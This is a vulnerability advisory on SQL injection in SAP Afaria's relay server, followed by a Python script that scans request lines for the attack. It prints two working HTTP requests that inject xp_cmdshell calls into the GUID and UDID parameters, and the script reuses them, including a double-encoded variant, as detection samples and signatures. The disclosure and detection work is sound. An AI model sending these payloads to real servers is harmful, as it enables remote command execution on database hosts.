SSD Advisory – SAP Afaria SQL Injection

Vulnerabilities Summary
The following advisory describes SQL injection vulnerabilities in SAP Afaria Service Pack 4 HotFix 15 that can lead to arbitrary code execution.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Responses
SAP has released a patch for Afaria, Service Pack 5 (SP5), to address the vulnerability.

Vulnerability Details
When Afaria is installed on a mobile device, the user is given an “enrollment code” that is used to identify the relay server. This enrollment code is a tinyurl URI that redirects to the relay server, so that users do not have to type in the full https://FQDN/path.
The following two HTTP requests trigger the SQL injection and invoke MS SQL Server’s xp_cmdshell extended stored procedure, causing the SQL server to execute arbitrary commands. In both cases the injected value is passed unsanitized in a query-string parameter (GUID and UDID respectively) of the relay server’s aipService.svc endpoint.
Command Injection #1

GET /ias_relay_server/client/rs_client.dll/mdm-es/devauth/aipService.svc/StartEnrollment?GUID=GUID';CALL%20xp_cmdshell('INJECT_COMMAND');-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive

Command Injection #2

GET /ias_relay_server/client/rs_client.dll/mdm-es/devunauth/aipService.svc/GetClientBrandingData?UDID=UDID';CALL%20xp_cmdshell('INJECT_COMMAND');--&TenantID=0&ImageType=iPad1G HTTP/1.1
Host: example.com:443
User-Agent: Afaria iPhone Client
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: ias-rs-sessionid="cookie"
Connection: keep-alive
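The two requests above share a recognisable shape: a query-string parameter that should be an opaque identifier instead carries a closing quote, a stacked statement and a trailing comment terminator, with the payload possibly percent-encoded more than once. The following Python script is an added detection example written for this advisory; it is not part of the original advisory or of SAP’s product. It scans request lines, fully URL-decodes each parameter, checks the value against the shape the parameter is expected to have, and flags the SQL-injection indicators seen in the two requests. The sample request lines are constructed for this example, and the expected shapes (a UUID for GUID, a 40-character hexadecimal string for UDID, a number for TenantID) are assumptions, not documented Afaria formats; adjust them to the identifiers your deployment actually issues. Positive validation of the parameter shape is what catches variants that avoid the literal xp_cmdshell string, and it is also the check the server side should be doing (together with parameterised queries) before a value reaches the database.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample request lines (not captured traffic), modelled on the
# advisory's two requests plus two benign requests for comparison.
SAMPLE_REQUEST_LINES = [
    "GET /ias_relay_server/client/rs_client.dll/mdm-es/devauth/aipService.svc/"
    "StartEnrollment?GUID=7f3c2a10-1111-2222-3333-444455556666 HTTP/1.1",
    "GET /ias_relay_server/client/rs_client.dll/mdm-es/devauth/aipService.svc/"
    "StartEnrollment?GUID=GUID';CALL%20xp_cmdshell('INJECT_COMMAND');-- HTTP/1.1",
    # Double-encoded variant: %2520 decodes to %20, which decodes to a space.
    "GET /ias_relay_server/client/rs_client.dll/mdm-es/devunauth/aipService.svc/"
    "GetClientBrandingData?UDID=UDID%27%3BCALL%2520xp_cmdshell%28%27x%27%29%3B--"
    "&TenantID=0&ImageType=iPad1G HTTP/1.1",
    "GET /ias_relay_server/client/rs_client.dll/mdm-es/devunauth/aipService.svc/"
    "GetClientBrandingData?UDID=abcdef0123456789abcdef0123456789abcdef01"
    "&TenantID=0&ImageType=iPad1G HTTP/1.1",
]

# Assumed expected shapes for the parameters seen in the advisory. These are
# assumptions for this example, not documented Afaria formats.
EXPECTED_SHAPE = {
    "GUID": re.compile(r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"),
    "UDID": re.compile(r"[0-9a-fA-F]{40}"),
    "TenantID": re.compile(r"\d+"),
    "ImageType": re.compile(r"[A-Za-z0-9]+"),
}

# Indicators drawn from the advisory's payloads, checked after full decoding.
SIGNATURES = [
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.IGNORECASE)),
    ("quote_then_stacked_statement", re.compile(r"'\s*;")),
    ("comment_terminator", re.compile(r"--\s*$")),
]


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly until the value stops changing, to defeat
    double (or triple) encoding of the payload."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_request_line(request_line):
    """Split 'METHOD target HTTP/x.y' into path and decoded query parameters.
    The query is split on '&' by hand so that ';' inside a value is never
    treated as a pair separator."""
    parts = request_line.split()
    target = parts[1] if len(parts) > 1 else ""
    split = urlsplit(target)
    params = {}
    for pair in split.query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        params[decode_fully(name)] = decode_fully(raw_value)
    return {"method": parts[0] if parts else "", "path": split.path, "params": params}


def assess_param(name, value):
    """Return the list of reasons a parameter value looks injected."""
    reasons = []
    shape = EXPECTED_SHAPE.get(name)
    if shape is not None and shape.fullmatch(value) is None:
        reasons.append(f"{name} does not match expected shape")
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            reasons.append(label)
    return reasons


def scan_request_lines(lines):
    """Scan request lines and return one finding per suspicious parameter."""
    findings = []
    for index, line in enumerate(lines):
        parsed = parse_request_line(line)
        for name, value in parsed["params"].items():
            reasons = assess_param(name, value)
            if reasons:
                findings.append({"line": index, "path": parsed["path"],
                                 "param": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_request_lines(SAMPLE_REQUEST_LINES):
        print(f"line {finding['line']}: {finding['path']} "
              f"param {finding['param']}: {', '.join(finding['reasons'])}")
```

Run against the constructed lines, the scan flags the GUID of the second request and the UDID of the third (the double-encoded one), and passes the two benign requests. Feeding it the cs-uri-stem and cs-uri-query columns of the relay server’s web server logs, rather than raw request lines, needs only a change to parse_request_line.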